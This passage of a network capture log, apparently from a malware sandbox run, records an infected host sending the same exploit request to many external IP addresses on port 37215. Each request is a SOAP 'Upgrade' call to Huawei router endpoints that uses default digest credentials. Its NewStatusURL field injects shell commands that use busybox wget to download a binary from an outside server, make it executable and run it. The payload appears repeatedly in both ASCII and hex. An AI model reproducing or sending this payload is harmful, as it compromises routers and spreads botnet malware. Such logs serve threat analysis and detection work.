                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1510192.168.2.1532828122.42.46.13937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.643771887 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1511192.168.2.1541168102.27.70.6437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.643774986 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1512192.168.2.1542984181.103.10.237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.643809080 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1513192.168.2.1551748157.163.148.8737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.643836021 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1514192.168.2.1549380138.168.205.25437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.643856049 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1515192.168.2.1534604121.146.169.4137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.643856049 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1516192.168.2.1550916181.117.13.5437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.643856049 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1517192.168.2.1554622166.123.87.12637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.643886089 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1518192.168.2.1547084156.98.250.1737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.643948078 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1519192.168.2.1545608122.155.16.11637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.643945932 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1520192.168.2.1542088190.195.54.17937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.643965960 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
